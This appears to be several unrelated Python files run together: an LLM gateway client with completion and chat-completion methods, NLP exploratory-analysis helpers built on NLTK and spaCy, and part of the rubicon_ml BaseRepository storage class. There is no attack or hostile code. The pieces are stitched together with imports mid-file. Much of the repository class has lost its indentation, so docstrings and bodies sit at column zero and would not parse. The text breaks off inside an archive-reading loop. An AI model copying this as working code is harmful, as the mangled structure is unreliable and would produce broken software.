class Completions(APIResource):
    """API resource for the `/v1/complete` (text completion) endpoint.

    `create` sends a single provider/model configuration. The batch helpers
    (`with_fallbacks`, `with_loadbalancing`, `single`) send a list of
    `LLMBase` configs using the corresponding Rubeus request mode.
    """

    @overload
    def create(
        self,
        *,
        prompt: str = "",
        timeout: Union[float, None] = DEFAULT_TIMEOUT,
        max_retries: int = DEFAULT_MAX_RETRIES,
        provider: Union[ProviderTypes, ProviderTypesLiteral] = ProviderTypes.OPENAI,
        model: str = "gpt-3.5-turbo",
        api_key: str = "",
        temperature: float = 0.1,
        top_k: Optional[int] = None,
        top_p: Optional[float] = None,
        stop_sequences: Optional[List[str]] = None,
        max_tokens: Optional[int] = None,
        trace_id: Optional[str] = None,
        cache_status: Optional[RubeusCacheType] = None,
        cache: Optional[bool] = False,
        metadata: Optional[Dict[str, Any]] = None,
        weight: Optional[float] = 1.0,
        stream: Literal[True],
        retry_settings: Optional[RetrySettings] = None,
        functions: Optional[List[Function]] = None,
        function_call: Optional[Union[None, str, Function]] = None,
        n: Optional[int] = None,
        logprobs: Optional[int] = None,
        echo: Optional[bool] = None,
        stop: Optional[Union[str, List[str]]] = None,
        presence_penalty: Optional[int] = None,
        frequency_penalty: Optional[int] = None,
        best_of: Optional[int] = None,
        logit_bias: Optional[Dict[str, int]] = None,
        user: Optional[str] = None,
    ) -> Stream[RubeusResponse]:
        ...

    @overload
    def create(
        self,
        *,
        prompt: str = "",
        timeout: Union[float, None] = DEFAULT_TIMEOUT,
        max_retries: int = DEFAULT_MAX_RETRIES,
        provider: Union[ProviderTypes, ProviderTypesLiteral] = ProviderTypes.OPENAI,
        model: str = "gpt-3.5-turbo",
        api_key: str = "",
        temperature: float = 0.1,
        top_k: Optional[int] = None,
        top_p: Optional[float] = None,
        stop_sequences: Optional[List[str]] = None,
        max_tokens: Optional[int] = None,
        trace_id: Optional[str] = None,
        cache_status: Optional[RubeusCacheType] = None,
        cache: Optional[bool] = False,
        metadata: Optional[Dict[str, Any]] = None,
        weight: Optional[float] = 1.0,
        stream: Literal[False] = False,
        retry_settings: Optional[RetrySettings] = None,
        functions: Optional[List[Function]] = None,
        function_call: Optional[Union[None, str, Function]] = None,
        n: Optional[int] = None,
        logprobs: Optional[int] = None,
        echo: Optional[bool] = None,
        stop: Optional[Union[str, List[str]]] = None,
        presence_penalty: Optional[int] = None,
        frequency_penalty: Optional[int] = None,
        best_of: Optional[int] = None,
        logit_bias: Optional[Dict[str, int]] = None,
        user: Optional[str] = None,
    ) -> RubeusResponse:
        ...

    @overload
    def create(
        self,
        *,
        prompt: str = "",
        timeout: Union[float, None] = DEFAULT_TIMEOUT,
        max_retries: int = DEFAULT_MAX_RETRIES,
        provider: Union[ProviderTypes, ProviderTypesLiteral] = ProviderTypes.OPENAI,
        model: str = "gpt-3.5-turbo",
        api_key: str = "",
        temperature: float = 0.1,
        top_k: Optional[int] = None,
        top_p: Optional[float] = None,
        stop_sequences: Optional[List[str]] = None,
        max_tokens: Optional[int] = None,
        trace_id: Optional[str] = None,
        cache_status: Optional[RubeusCacheType] = None,
        cache: Optional[bool] = False,
        metadata: Optional[Dict[str, Any]] = None,
        weight: Optional[float] = 1.0,
        stream: bool = False,
        retry_settings: Optional[RetrySettings] = None,
        functions: Optional[List[Function]] = None,
        function_call: Optional[Union[None, str, Function]] = None,
        n: Optional[int] = None,
        logprobs: Optional[int] = None,
        echo: Optional[bool] = None,
        stop: Optional[Union[str, List[str]]] = None,
        presence_penalty: Optional[int] = None,
        frequency_penalty: Optional[int] = None,
        best_of: Optional[int] = None,
        logit_bias: Optional[Dict[str, int]] = None,
        user: Optional[str] = None,
    ) -> Union[RubeusResponse, Stream[RubeusResponse]]:
        ...

    def create(
        self,
        *,
        prompt: str = "",
        timeout: Union[float, None] = DEFAULT_TIMEOUT,
        max_retries: int = DEFAULT_MAX_RETRIES,
        provider: Union[ProviderTypes, ProviderTypesLiteral] = ProviderTypes.OPENAI,
        model: str = "gpt-3.5-turbo",
        api_key: str = "",
        temperature: float = 0.1,
        top_k: Optional[int] = None,
        top_p: Optional[float] = None,
        stop_sequences: Optional[List[str]] = None,
        max_tokens: Optional[int] = None,
        trace_id: Optional[str] = None,
        cache_status: Optional[RubeusCacheType] = None,
        cache: Optional[bool] = False,
        metadata: Optional[Dict[str, Any]] = None,
        weight: Optional[float] = 1.0,
        stream: bool = False,
        retry_settings: Optional[RetrySettings] = None,
        functions: Optional[List[Function]] = None,
        function_call: Optional[Union[None, str, Function]] = None,
        n: Optional[int] = None,
        logprobs: Optional[int] = None,
        echo: Optional[bool] = None,
        stop: Optional[Union[str, List[str]]] = None,
        presence_penalty: Optional[int] = None,
        frequency_penalty: Optional[int] = None,
        best_of: Optional[int] = None,
        logit_bias: Optional[Dict[str, int]] = None,
        user: Optional[str] = None,
    ) -> Union[RubeusResponse, Stream[RubeusResponse]]:
        """Send a single completion request to `/v1/complete`.

        Parameters mirror the Rubeus `Body` schema. Returns a
        `Stream[RubeusResponse]` when `stream=True`, otherwise a
        `RubeusResponse`.
        """
        llm = Body(
            prompt=prompt,
            timeout=timeout,
            max_retries=max_retries,
            provider=provider,
            model=model,
            api_key=api_key,
            temperature=temperature,
            top_k=top_k,
            top_p=top_p,
            stop_sequences=stop_sequences,
            max_tokens=max_tokens,
            trace_id=trace_id,
            cache_status=cache_status,
            cache=cache,
            metadata=metadata,
            weight=weight,
            retry_settings=retry_settings,
            functions=functions,
            function_call=function_call,
            n=n,
            logprobs=logprobs,
            echo=echo,
            stop=stop,
            presence_penalty=presence_penalty,
            frequency_penalty=frequency_penalty,
            best_of=best_of,
            logit_bias=logit_bias,
            user=user,
        )
        # NOTE(review): `create` passes the mode as a plain string
        # (`RubeusModes.SINGLE.value`) while the batch helpers pass the enum
        # member — confirm `_post` accepts both forms before unifying.
        return self._post(
            "/v1/complete",
            body=[llm],
            mode=RubeusModes.SINGLE.value,
            cast_to=RubeusResponse,
            stream_cls=Stream[RubeusResponse],
            stream=stream,
        )

    def _request_batch(
        self, llms: List[LLMBase], mode: RubeusModes, stream: bool
    ) -> Union[RubeusResponse, Stream[RubeusResponse]]:
        """POST a batch of LLM configs to `/v1/complete` in request `mode`."""
        body = [cast(Body, llm) for llm in llms]
        return self._post(
            "/v1/complete",
            body=body,
            mode=mode,
            cast_to=RubeusResponse,
            stream_cls=Stream[RubeusResponse],
            stream=stream,
        )

    # NOTE(review): the previous overloads declared `llms` keyword-only
    # (`*, llms`) while the implementation accepts it positionally. The
    # overloads below match the implementation so type checkers accept
    # every call the runtime accepts.
    @overload
    def with_fallbacks(
        self, llms: List[LLMBase], stream: Literal[True]
    ) -> Stream[RubeusResponse]:
        ...

    @overload
    def with_fallbacks(
        self, llms: List[LLMBase], stream: Literal[False] = False
    ) -> RubeusResponse:
        ...

    @overload
    def with_fallbacks(
        self, llms: List[LLMBase], stream: bool = False
    ) -> Union[RubeusResponse, Stream[RubeusResponse]]:
        ...

    def with_fallbacks(
        self, llms: List[LLMBase], stream: bool = False
    ) -> Union[RubeusResponse, Stream[RubeusResponse]]:
        """Send `llms` in fallback mode (presumably: try each config in
        order until one succeeds — confirm against the Rubeus gateway)."""
        return self._request_batch(llms, RubeusModes.FALLBACK, stream)

    @overload
    def with_loadbalancing(
        self, llms: List[LLMBase], stream: Literal[True]
    ) -> Stream[RubeusResponse]:
        ...

    @overload
    def with_loadbalancing(
        self, llms: List[LLMBase], stream: Literal[False] = False
    ) -> RubeusResponse:
        ...

    @overload
    def with_loadbalancing(
        self, llms: List[LLMBase], stream: bool = False
    ) -> Union[RubeusResponse, Stream[RubeusResponse]]:
        ...

    def with_loadbalancing(
        self, llms: List[LLMBase], stream: bool = False
    ) -> Union[RubeusResponse, Stream[RubeusResponse]]:
        """Send `llms` in load-balancing mode."""
        return self._request_batch(llms, RubeusModes.LOADBALANCE, stream)

    @overload
    def single(
        self, llms: List[LLMBase], stream: Literal[True]
    ) -> Stream[RubeusResponse]:
        ...

    @overload
    def single(
        self, llms: List[LLMBase], stream: Literal[False] = False
    ) -> RubeusResponse:
        ...

    @overload
    def single(
        self, llms: List[LLMBase], stream: bool = False
    ) -> Union[RubeusResponse, Stream[RubeusResponse]]:
        ...

    def single(
        self, llms: List[LLMBase], stream: bool = False
    ) -> Union[RubeusResponse, Stream[RubeusResponse]]:
        """Send `llms` in single mode."""
        return self._request_batch(llms, RubeusModes.SINGLE, stream)
class ChatCompletions(APIResource):
    """API resource for the `/v1/chatComplete` (chat completion) endpoint.

    `create` sends a single provider/model configuration. The batch helpers
    (`with_fallbacks`, `with_loadbalancing`, `single`) send a list of
    `LLMBase` configs using the corresponding Rubeus request mode.
    """

    @overload
    def create(
        self,
        *,
        messages: List[Message],
        provider: ProviderTypes = ProviderTypes.OPENAI,
        model: str = "gpt-3.5-turbo",
        api_key: str = "",
        timeout: Union[float, None] = DEFAULT_TIMEOUT,
        max_retries: int = DEFAULT_MAX_RETRIES,
        temperature: float = 0.1,
        top_k: Optional[int] = None,
        top_p: Optional[float] = None,
        stop_sequences: Optional[List[str]] = None,
        max_tokens: Optional[int] = None,
        trace_id: Optional[str] = "",
        cache_status: Optional[RubeusCacheType] = None,
        cache: Optional[bool] = False,
        metadata: Optional[Dict[str, Any]] = None,
        weight: Optional[float] = 1.0,
        stream: Literal[True],
        retry_settings: Optional[RetrySettings] = None,
        functions: Optional[List[Function]] = None,
        function_call: Optional[Union[None, str, Function]] = None,
        n: Optional[int] = None,
        logprobs: Optional[int] = None,
        echo: Optional[bool] = None,
        stop: Optional[Union[str, List[str]]] = None,
        presence_penalty: Optional[int] = None,
        frequency_penalty: Optional[int] = None,
        best_of: Optional[int] = None,
        logit_bias: Optional[Dict[str, int]] = None,
        user: Optional[str] = None,
    ) -> Stream[RubeusResponse]:
        ...

    @overload
    def create(
        self,
        *,
        messages: List[Message],
        provider: ProviderTypes = ProviderTypes.OPENAI,
        model: str = "gpt-3.5-turbo",
        api_key: str = "",
        timeout: Union[float, None] = DEFAULT_TIMEOUT,
        max_retries: int = DEFAULT_MAX_RETRIES,
        temperature: float = 0.1,
        top_k: Optional[int] = None,
        top_p: Optional[float] = None,
        stop_sequences: Optional[List[str]] = None,
        max_tokens: Optional[int] = None,
        trace_id: Optional[str] = "",
        cache_status: Optional[RubeusCacheType] = None,
        cache: Optional[bool] = False,
        metadata: Optional[Dict[str, Any]] = None,
        weight: Optional[float] = 1.0,
        stream: Literal[False] = False,
        retry_settings: Optional[RetrySettings] = None,
        functions: Optional[List[Function]] = None,
        function_call: Optional[Union[None, str, Function]] = None,
        n: Optional[int] = None,
        logprobs: Optional[int] = None,
        echo: Optional[bool] = None,
        stop: Optional[Union[str, List[str]]] = None,
        presence_penalty: Optional[int] = None,
        frequency_penalty: Optional[int] = None,
        best_of: Optional[int] = None,
        logit_bias: Optional[Dict[str, int]] = None,
        user: Optional[str] = None,
    ) -> RubeusResponse:
        ...

    @overload
    def create(
        self,
        *,
        messages: List[Message],
        provider: ProviderTypes = ProviderTypes.OPENAI,
        model: str = "gpt-3.5-turbo",
        api_key: str = "",
        timeout: Union[float, None] = DEFAULT_TIMEOUT,
        max_retries: int = DEFAULT_MAX_RETRIES,
        temperature: float = 0.1,
        top_k: Optional[int] = None,
        top_p: Optional[float] = None,
        stop_sequences: Optional[List[str]] = None,
        max_tokens: Optional[int] = None,
        trace_id: Optional[str] = "",
        cache_status: Optional[RubeusCacheType] = None,
        cache: Optional[bool] = False,
        metadata: Optional[Dict[str, Any]] = None,
        weight: Optional[float] = 1.0,
        stream: bool = False,
        retry_settings: Optional[RetrySettings] = None,
        functions: Optional[List[Function]] = None,
        function_call: Optional[Union[None, str, Function]] = None,
        n: Optional[int] = None,
        logprobs: Optional[int] = None,
        echo: Optional[bool] = None,
        stop: Optional[Union[str, List[str]]] = None,
        presence_penalty: Optional[int] = None,
        frequency_penalty: Optional[int] = None,
        best_of: Optional[int] = None,
        logit_bias: Optional[Dict[str, int]] = None,
        user: Optional[str] = None,
    ) -> Union[RubeusResponse, Stream[RubeusResponse]]:
        ...

    def create(
        self,
        *,
        messages: List[Message],
        provider: ProviderTypes = ProviderTypes.OPENAI,
        model: str = "gpt-3.5-turbo",
        api_key: str = "",
        timeout: Union[float, None] = DEFAULT_TIMEOUT,
        max_retries: int = DEFAULT_MAX_RETRIES,
        temperature: float = 0.1,
        top_k: Optional[int] = None,
        top_p: Optional[float] = None,
        stop_sequences: Optional[List[str]] = None,
        max_tokens: Optional[int] = None,
        trace_id: Optional[str] = "",
        cache_status: Optional[RubeusCacheType] = None,
        cache: Optional[bool] = False,
        metadata: Optional[Dict[str, Any]] = None,
        weight: Optional[float] = 1.0,
        stream: bool = False,
        retry_settings: Optional[RetrySettings] = None,
        functions: Optional[List[Function]] = None,
        function_call: Optional[Union[None, str, Function]] = None,
        n: Optional[int] = None,
        logprobs: Optional[int] = None,
        echo: Optional[bool] = None,
        stop: Optional[Union[str, List[str]]] = None,
        presence_penalty: Optional[int] = None,
        frequency_penalty: Optional[int] = None,
        best_of: Optional[int] = None,
        logit_bias: Optional[Dict[str, int]] = None,
        user: Optional[str] = None,
    ) -> Union[RubeusResponse, Stream[RubeusResponse]]:
        """Send a single chat completion request to `/v1/chatComplete`.

        Parameters mirror the Rubeus `Body` schema. Returns a
        `Stream[RubeusResponse]` when `stream=True`, otherwise a
        `RubeusResponse`.
        """
        llm = Body(
            messages=messages,
            timeout=timeout,
            max_retries=max_retries,
            provider=provider,
            model=model,
            api_key=api_key,
            temperature=temperature,
            top_k=top_k,
            top_p=top_p,
            stop_sequences=stop_sequences,
            max_tokens=max_tokens,
            trace_id=trace_id,
            cache_status=cache_status,
            cache=cache,
            metadata=metadata,
            weight=weight,
            retry_settings=retry_settings,
            functions=functions,
            function_call=function_call,
            n=n,
            logprobs=logprobs,
            echo=echo,
            stop=stop,
            presence_penalty=presence_penalty,
            frequency_penalty=frequency_penalty,
            best_of=best_of,
            logit_bias=logit_bias,
            user=user,
        )
        # NOTE(review): `create` passes the mode as a plain string
        # (`RubeusModes.SINGLE.value`) while the batch helpers pass the enum
        # member — confirm `_post` accepts both forms before unifying.
        return self._post(
            "/v1/chatComplete",
            body=[llm],
            mode=RubeusModes.SINGLE.value,
            cast_to=RubeusResponse,
            stream_cls=Stream[RubeusResponse],
            stream=stream,
        )

    def _request_batch(
        self, llms: List[LLMBase], mode: RubeusModes, stream: bool
    ) -> Union[RubeusResponse, Stream[RubeusResponse]]:
        """POST a batch of LLM configs to `/v1/chatComplete` in request `mode`."""
        body = [cast(Body, llm) for llm in llms]
        return self._post(
            "/v1/chatComplete",
            body=body,
            mode=mode,
            cast_to=RubeusResponse,
            stream_cls=Stream[RubeusResponse],
            stream=stream,
        )

    @overload
    def with_fallbacks(
        self, *, llms: List[LLMBase], stream: Literal[True]
    ) -> Stream[RubeusResponse]:
        ...

    @overload
    def with_fallbacks(
        self, *, llms: List[LLMBase], stream: Literal[False] = False
    ) -> RubeusResponse:
        ...

    @overload
    def with_fallbacks(
        self, *, llms: List[LLMBase], stream: bool = False
    ) -> Union[RubeusResponse, Stream[RubeusResponse]]:
        ...

    def with_fallbacks(
        self, *, llms: List[LLMBase], stream: bool = False
    ) -> Union[RubeusResponse, Stream[RubeusResponse]]:
        """Send `llms` in fallback mode (presumably: try each config in
        order until one succeeds — confirm against the Rubeus gateway)."""
        return self._request_batch(llms, RubeusModes.FALLBACK, stream)

    @overload
    def with_loadbalancing(
        self, llms: List[LLMBase], stream: Literal[True]
    ) -> Stream[RubeusResponse]:
        ...

    @overload
    def with_loadbalancing(
        self, llms: List[LLMBase], stream: Literal[False] = False
    ) -> RubeusResponse:
        ...

    @overload
    def with_loadbalancing(
        self, llms: List[LLMBase], stream: bool = False
    ) -> Union[RubeusResponse, Stream[RubeusResponse]]:
        ...

    def with_loadbalancing(
        self, llms: List[LLMBase], stream: bool = False
    ) -> Union[RubeusResponse, Stream[RubeusResponse]]:
        """Send `llms` in load-balancing mode."""
        return self._request_batch(llms, RubeusModes.LOADBALANCE, stream)

    @overload
    def single(
        self, llms: List[LLMBase], stream: Literal[True]
    ) -> Stream[RubeusResponse]:
        ...

    @overload
    def single(
        self, llms: List[LLMBase], stream: Literal[False] = False
    ) -> RubeusResponse:
        ...

    @overload
    def single(
        self, llms: List[LLMBase], stream: bool = False
    ) -> Union[RubeusResponse, Stream[RubeusResponse]]:
        ...

    def single(
        self, llms: List[LLMBase], stream: bool = False
    ) -> Union[RubeusResponse, Stream[RubeusResponse]]:
        """Send `llms` in single mode."""
        return self._request_batch(llms, RubeusModes.SINGLE, stream)
from itertools import chain
from collections import Counter
from typing import List, Dict, Set
import re
import nltk
def word_counter(corpus: List[List[str]]) -> Dict[str, int]:
    """
    Count how many times each word appears in a corpus.

    Arguments:
        corpus: List[List[str]]
            The corpus as a list of tokenized sentences.

    Returns
    ---------
    Dict[str, int]: The corpus's word count, ordered from most to least
    frequent (ties keep first-seen order).
    """
    # `most_common()` sorts by count descending with a stable sort, which
    # matches the previous manual `sorted(..., reverse=True)` ordering.
    count = Counter(chain.from_iterable(corpus))
    return dict(count.most_common())
def sentence_length(corpus: List[str]) -> List[int]:
    """
    Compute the length of each sentence in the corpus.

    Arguments
    ----------
    corpus: List[str]
        A list of sentences

    Returns
    --------
    List[int]: the length of each sentence, in the same order as `corpus`
    """
    return [len(sentence) for sentence in corpus]
# This function is an alternative for when FeatureEnginieringNLP is too computationally expensive
def clean_and_tokenize(string: str) -> List[str]:
    """
    Remove punctuation, lowercase and tokenize a sentence.

    Arguments
    ----------
    string: str
        A sentence of the corpus

    Returns
    --------
    List[str]: the tokens of the cleaned, lowercased sentence
    """
    # Strip only sentence-internal punctuation (. , : ;) before tokenizing.
    cleaned = re.sub(r"[.,:;]", "", string).lower()
    # NOTE(review): a new TreebankWordTokenizer is built per call; hoisting it
    # to module level would avoid the repeated construction cost.
    return nltk.tokenize.treebank.TreebankWordTokenizer().tokenize(cleaned)
class RemoveStopWords:
    """
    Remove stopwords from tokenized sentences.

    Arguments
    ----------
    language: str
        The language whose NLTK stopword list to load

    Methods
    --------
    add_stopwords: add extra stopwords to remove
    fit: remove stopwords from a tokenized sentence
    """

    def __init__(self, language: str = "english") -> None:
        self.stopwords = set(nltk.corpus.stopwords.words(language))

    def fit(self, string: List[str]) -> List[str]:
        """
        Remove the stopwords from a tokenized sentence.

        Arguments
        -----------
        string: List[str]
            The tokenized sentence to clean

        Returns:
            The sentence tokens with stopwords removed, order preserved
        """
        return [word for word in string if word not in self.stopwords]

    def add_stopwords(self, stopwords: Set[str]) -> None:
        """
        Add a set of stopwords to clean.

        Arguments:
        -----------
        stopwords: Set[str]
            Words to additionally remove in subsequent `fit` calls
        """
        # Update in place instead of rebuilding the whole set each call.
        self.stopwords.update(stopwords)
from typing import Callable, List, Optional

import spacy

from utils import tqdm_manager
class SentenceEDA:
    """
    An EDA manager you can add functions to in order to create pipelines,
    keeping EDA clear and efficient.

    Parameters
    -----------
    corpus: list
        A list of strings to apply the functions to
    funcs_to_map: list
        The functions to map over the corpus (each receives the full corpus)

    Methods
    --------
    fit: Execute all the functions added
    """

    def __init__(self, corpus: list, funcs_to_map: List[Callable]) -> None:
        self.corpus = corpus
        self.funcs_to_map = funcs_to_map
        self.result_per_func: list = []

    def fit(self) -> List[List]:
        """
        Compute all EDA functions added.

        Results are recomputed (not appended) on every call, so calling
        `fit` repeatedly yields the same output instead of accumulating
        duplicates.

        Returns:
            A list with the result of every function, in the order supplied
        """
        self.result_per_func = [func(self.corpus) for func in self.funcs_to_map]
        return self.result_per_func
class FeatureEnginieringNLP:
    """
    Create up to 3 new variables from NLP: the token, the lemma and the POS
    tag. (These operations use a spaCy pipeline and can be computationally
    expensive.)

    Parameters
    -----------
    model: str
        The spaCy pretrained model to load
    functions: Optional[List[str]]
        The operations to perform on a corpus; defaults to all of:
        - "token": tokenization
        - "lemma": lemmatization
        - "pos": Part Of Speech tagging

    Methods
    --------
    fit: compute the functions selected in `self.functions`
    """

    def __init__(
        self,
        model: str = "en_core_web_trf",
        functions: Optional[List[str]] = None,
    ):
        # Avoid a mutable default argument by using None as the sentinel.
        self.functions = ["token", "lemma", "pos"] if functions is None else functions
        self.nlp = spacy.load(model)

    def _check_func(self, func: str, doc) -> list:
        """
        Apply one named operation to a parsed spaCy doc.

        Arguments
        ----------
        func: str
            The operation name ("token", "lemma" or anything else for POS)
        doc
            The parsed document (iterable of tokens) to apply the function to

        Returns
        --------
        The result of computing `func` over `doc`
        """
        if func == "token":
            return list(doc)
        if func == "lemma":
            return [word.lemma_ for word in doc]
        # Any other name falls through to POS, matching historical behavior.
        return [word.pos_ for word in doc]

    def fit(self, corpus: List[str], verbose: bool = True) -> dict:
        """
        Compute the functions selected in `self.functions`.

        Arguments:
        -----------
        corpus: List[str]
            All the sentences to compute the operations on
        verbose: bool
            Run with verbose progress reporting (tqdm) or not

        Returns
        --------
        A dictionary with the parsed docs under "nlp" plus one key per
        entry of `self.functions` mapping to that operation's results
        """
        nlp_parse = tqdm_manager(corpus, self.nlp, verbose)
        results = {"nlp": nlp_parse}
        for func in self.functions:
            results[func] = [self._check_func(func, sentence) for sentence in nlp_parse]
        return results
import os
import shutil
import tempfile
import warnings
from datetime import datetime
from typing import List, Optional
from zipfile import ZipFile
import fsspec
import pandas as pd
from rubicon_ml import domain
from rubicon_ml.exceptions import RubiconException
from rubicon_ml.repository.utils import json, slugify
class BaseRepository:
"""The base repository defines all the shared interactions
between the various Rubicon persistence options.
    `BaseRepository` itself should never be used directly. Use
one of the repositories that extends this class to persist
Rubicon data:
* `rubicon.repository.MemoryRepository`
* `rubicon.repository.LocalRepository`
* `rubicon.repository.S3Repository`
Parameters
----------
root_dir : str
Absolute path to the root directory to persist Rubicon
data to.
storage_options : dict, optional
Additional keyword arguments that are passed directly to
the underlying filesystem class.
"""
    def __init__(self, root_dir, **storage_options):
        # `PROTOCOL` is not defined on this base class; presumably each
        # concrete repository subclass sets it (e.g. "file", "s3") — confirm.
        self.filesystem = fsspec.filesystem(self.PROTOCOL, **storage_options)
        # Strip any trailing slash so f"{self.root_dir}/..." paths stay clean.
        self.root_dir = root_dir.rstrip("/")
# --- Filesystem Helpers ---
    def _cat(self, path):
        """Returns the contents of the file at `path` (raw bytes from fsspec)."""
        return self.filesystem.cat(path)
def _cat_paths(self, metadata_paths):
"""Cat `metadata_paths` to get the list of files to include.
Ignore FileNotFoundErrors to avoid misc file errors, like hidden
dotfiles.
"""
files = []
for path, metadata in self.filesystem.cat(metadata_paths, on_error="return").items():
if isinstance(metadata, FileNotFoundError):
warning = f"{path} not found. Was this file unintentionally created?"
warnings.warn(warning)
else:
files.append(metadata)
return files
    def _exists(self, path):
        """Returns True if a file or directory exists at `path`, False otherwise."""
        return self.filesystem.exists(path)
    def _glob(self, globstring):
        """Returns the files matching `globstring`.

        With `detail=True` fsspec returns a mapping of path -> info dict,
        not just the path names.
        """
        return self.filesystem.glob(globstring, detail=True)
def _ls_directories_only(self, path):
"""Returns the names of all the directories at path `path`."""
directories = [
os.path.join(p.get("name"), "metadata.json")
for p in self.filesystem.ls(path, detail=True)
if p.get("type", p.get("StorageClass")).lower() == "directory"
]
return directories
    def _ls(self, path):
        """Returns the listing of `path` from the underlying filesystem."""
        return self.filesystem.ls(path)
    def _mkdir(self, dirpath):
        """Creates a directory `dirpath` with parents (no error if it exists)."""
        return self.filesystem.mkdirs(dirpath, exist_ok=True)
    def _modified(self, path):
        """Returns the last-modified timestamp of the file at `path`."""
        return self.filesystem.modified(path)
    def _persist_bytes(self, bytes_data, path):
        """Write bytes to the filesystem.

        To be implemented by extensions of the base filesystem.

        Raises
        ------
        NotImplementedError
            Always, on this base class.
        """
        raise NotImplementedError()
    def _persist_domain(self, domain, path):
        """Write a domain object to the filesystem.

        To be implemented by extensions of the base filesystem.

        Raises
        ------
        NotImplementedError
            Always, on this base class.
        """
        raise NotImplementedError()
def _read_bytes(self, path, err_msg=None):
"""Read bytes from the file at `path`."""
try:
open_file = self.filesystem.open(path, "rb")
except FileNotFoundError:
raise RubiconException(err_msg)
return open_file.read()
def _read_domain(self, path, err_msg=None):
"""Read a domain object from the file at `path`."""
try:
open_file = self.filesystem.open(path)
except FileNotFoundError:
raise RubiconException(err_msg)
return json.load(open_file)
    def _rm(self, path):
        """Recursively remove all files at `path`."""
        return self.filesystem.rm(path, recursive=True)
# -------- Projects --------
    def _get_project_metadata_path(self, project_name):
        """Returns the path of the project with name `project_name`'s
        metadata.
        """
        # Project directories are keyed by the slugified project name.
        return f"{self.root_dir}/{slugify(project_name)}/metadata.json"
def create_project(self, project):
"""Persist a project to the configured filesystem.
Parameters
----------
project : rubicon.domain.Project
The project to persist.
"""
project_metadata_path = self._get_project_metadata_path(project.name)
if self._exists(project_metadata_path):
raise RubiconException(f"A project with name '{project.name}' already exists.")
self._persist_domain(project, project_metadata_path)
def get_project(self, project_name):
"""Retrieve a project from the configured filesystem.
Parameters
----------
project_name : str
The name of the project to retrieve.
Returns
-------
rubicon.domain.Project
The project with name `project_name`.
"""
project_metadata_path = self._get_project_metadata_path(project_name)
try:
project = json.loads(self._cat(project_metadata_path))
except FileNotFoundError:
raise RubiconException(f"No project with name '{project_name}' found.")
return domain.Project(**project)
def get_projects(self):
"""Get the list of projects from the filesystem.
Returns
-------
list of rubicon.domain.Project
The list of projects from the filesystem.
"""
try:
project_metadata_paths = self._ls_directories_only(self.root_dir)
projects = [
domain.Project(**json.loads(metadata))
for metadata in self._cat_paths(project_metadata_paths)
]
projects.sort(key=lambda p: p.created_at)
except FileNotFoundError:
return []
return projects
# ------ Experiments -------
    def _get_experiment_metadata_root(self, project_name):
        """Returns the experiments directory of the project with
        name `project_name`.
        """
        return f"{self.root_dir}/{slugify(project_name)}/experiments"
    def _get_experiment_metadata_path(self, project_name, experiment_id):
        """Returns the path of the experiment with ID
        `experiment_id`'s metadata.
        """
        experiment_metadata_root = self._get_experiment_metadata_root(project_name)

        # Experiment directories are keyed by the experiment's ID.
        return f"{experiment_metadata_root}/{experiment_id}/metadata.json"
def create_experiment(self, experiment):
"""Persist an experiment to the configured filesystem.
Parameters
----------
experiment : rubicon.domain.Experiment
The experiment to persist.
"""
experiment_metadata_path = self._get_experiment_metadata_path(
experiment.project_name, experiment.id
)
self._persist_domain(experiment, experiment_metadata_path)
def get_experiment(self, project_name, experiment_id):
"""Retrieve an experiment from the configured filesystem.
Parameters
----------
project_name : str
The name of the project the experiment with ID
`experiment_id` is logged to.
experiment_id : str
The ID of the experiment to retrieve.
Returns
-------
rubicon.domain.Experiment
The experiment with ID `experiment_id`.
"""
experiment_metadata_path = self._get_experiment_metadata_path(project_name, experiment_id)
experiment = self._read_domain(
experiment_metadata_path,
f"No experiment with id `{experiment_id}` found.",
)
return domain.Experiment(**experiment)
def get_experiments(self, project_name):
"""Retrieve all experiments from the configured filesystem
that belong to the project with name `project_name`.
Parameters
----------
project_name : str
The name of the project to retrieve all experiments
from.
Returns
-------
list of rubicon.domain.Experiment
The experiments logged to the project with name
`project_name`.
"""
experiment_metadata_root = self._get_experiment_metadata_root(project_name)
try:
experiment_metadata_paths = self._ls_directories_only(experiment_metadata_root)
experiments = [
domain.Experiment(**json.loads(metadata))
for metadata in self._cat_paths(experiment_metadata_paths)
]
experiments.sort(key=lambda e: e.created_at)
except FileNotFoundError:
return []
return experiments
# ------- Archiving --------
def _archive(
self,
project_name,
experiments: Optional[List] = None,
remote_rubicon_root: Optional[str] = None,
):
"""Archive the experiments logged to this project.
Parameters
----------
project_name : str
Name of the calling project (project to create archive for)
experiments : list of Experiments, optional
The rubicon.client.Experiment objects to archive. If None all logged experiments are archived.
remote_rubicon_root : str or pathlike object, optional
The remote root of the repository to archive to
Returns
-------
filepath of newly created archive
"""
remote_s3 = True if remote_rubicon_root and remote_rubicon_root.startswith("s3") else False
root_dir = remote_rubicon_root if remote_rubicon_root is not None else self.root_dir
archive_dir = os.path.join(root_dir, slugify(project_name), "archives")
ts = datetime.timestamp(datetime.now())
archive_path = os.path.join(archive_dir, "archive-" + str(ts))
zip_archive_filename = str(archive_path + ".zip")
experiments_path = self._get_experiment_metadata_root(project_name)
if not remote_s3:
if not self._exists(archive_dir):
self._mkdir(archive_dir)
file_name = None
with tempfile.NamedTemporaryFile() as tf:
if experiments is not None:
with ZipFile(tf, "x") as archive:
experiment_paths = []
for experiment in experiments:
experiment_paths.append(os.path.join(experiments_path, experiment.id))
for file_path in experiment_paths:
archive.write(file_path, os.path.basename(file_path))
file_name = archive.filename
else:
file_name = shutil.make_archive(tf.name, "zip", experiments_path)
with fsspec.open(zip_archive_filename, "wb") as fp:
with open(file_name, "rb") as tf:
fp.write(tf.read())
return zip_archive_filename
def _experiments_from_archive(
self, project_name, remote_rubicon_root: str, latest_only: Optional[bool] = False
):
"""Retrieve archived experiments into this project's experiments folder.
Parameters
----------
project_name : str
Name of the calling project (project to read experiments into)
remote_rubicon_root : str or pathlike object
The remote Rubicon object with the repository containing archived experiments to read in
latest_only : bool, optional
Indicates whether or not experiments should only be read from the latest archive
"""
root_dir = self.root_dir
shutil.copy(
os.path.join(remote_rubicon_root, slugify(project_name), "metadata.json"),
os.path.join(root_dir, slugify(project_name)),
)
archive_dir = os.path.join(remote_rubicon_root, slugify(project_name), "archives")
if not self._exists(archive_dir):
raise ValueError("`remote_rubicon_root` has no archives")
dest_experiments_dir = self._get_experiment_metadata_root(project_name)
if not self._exists(dest_experiments_dir):
self._mkdir(dest_experiments_dir)
og_num_experiments = len(self._ls(dest_experiments_dir))
if not latest_only:
for zip_archive_name in self._ls(archive_dir):
zip_archive_filepath = os.path.join(archive_dir, zip_archive_name)
